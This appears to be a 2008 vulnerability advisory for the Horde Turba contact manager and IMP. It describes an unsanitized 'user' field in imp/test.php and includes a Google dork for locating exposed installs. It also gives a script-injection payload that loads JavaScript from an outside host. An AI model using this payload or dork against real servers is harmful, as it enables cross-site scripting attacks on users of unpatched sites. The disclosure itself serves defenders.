Horde and Turbo Contact Manager version H3 2.2.1 suffers from cross site scripting and remote java file inclusion vulnerabilities.
e15ba10d01b7ecdcb51c287c32468066c6d357891e6a43b262a75ffe922c7dd5
+======================================================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities and Remote Java's File Inclusion +
+======================================================================================================+
Author(s): Ivan Sanchez
Product: Turba Contact Manager
Web: http://www.horde.org/turba/
Turba is the Horde contact management application. It is a production level
address book, and makes heavy use of the Horde framework to provide integration
with IMP and other Horde applications.
Date: 14/09/2008
----
Version Affected:
-----------------
Download :
http://ftp.horde.org/pub/turba/turba-h3-2.2.1.tar.gz
Others.
* Turba H3 (2.2.1) (final)
* turba-h3.1.1
* IMP: H3 (4.2)
* IMP: H3 (4.1)
* IMP: 4.1-cvs
* IMP: H3 (4.1.6)
* IMP: H3 (4.1.3)
* IMP: 3.2.2
Google Dork:
------------
inurl:"/imp/test.php?"
Evil Function:
--------------
http://site/horde/imp/test.php?
Internal Variables:
-------------------
1-Download Turba H3 (2.2.1) (final)and audit the internal code , So We can see .....
2-View the internal file-line.
File(test.php)
Lines: 92/94
$user = isset($_POST['user']) ? $_POST['user'] : ''; // 'user';
Then-
First Exploit:
-------------
Insert evil XSS , Remote Java's File into "texbox" (User)
Server ok
Protocol ok (e.g. "imap" or "imap/notls")
Port ok (defaults to "143")
User <---------------------------------- 'user'= "><script src=http://site/scripts/evil.js></script>
Password ok
Remediation:
------------
Sanitized all parameters-
Thx.
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+======================================================================================================+
+ Horde & Turba Contact Manager & XSS Vulnerabilities and Remote Java's File Inclusion +
+======================================================================================================+